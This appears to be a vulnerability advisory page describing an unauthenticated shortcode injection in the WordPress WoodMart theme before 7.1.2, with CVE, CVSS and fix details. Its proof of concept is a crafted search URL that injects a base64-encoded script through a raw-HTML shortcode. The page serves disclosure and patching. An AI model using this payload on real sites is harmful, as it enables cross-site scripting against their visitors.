Themes Vulnerabilities

WoodMart < 7.1.2 - Unauthenticated Arbitrary Shortcode Injection

Description

The theme could allow arbitrary shortcode to be injected when the "Display results from blog" settings is enabled, which could lead to Reflected XSS for example, when using a shortcode vulnerable to XSS

Proof of Concept

When the "Display results from blog" settings is enabled:

https://example.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting

Affects Themes

woodmart
Fixed in 7.1.2

References

CVE
CVE-2023-25790
URL
https://packetstormsecurity.com/files/#171154/

Classification

Type
INJECTION
OWASP top 10
A1: Injection
CVSS
7.5 (high)

Miscellaneous

Original Researcher
FearZzZz
Verified
No
WPVDB ID
d8d393dd-42f3-41c6-a68e-c400efaca4c8

Timeline

Publicly Published
2023-02-16 (about 1 years ago)
Added
2023-03-01 (about 1 years ago)
Last Updated
2023-03-01 (about 1 years ago)

Other

Published
Title
Published
2021-09-09
Title
WordPress 5.4 to 5.8 - Lodash Library Update
Published
2022-06-20
Title
WooCommerce < 6.6.0 - Admin+ Stored HTML Injection
Published
2020-03-04
Title
Appointment Booking Calendar < 1.3.35 - CSV Injection
Published
2020-10-01
Title
Multiple Themes - Unauthenticated Function Injection
Published
2023-11-16
Title
Jetpack < 12.7 - Authenticated(Contributor+) Clickjacking via Iframe Injection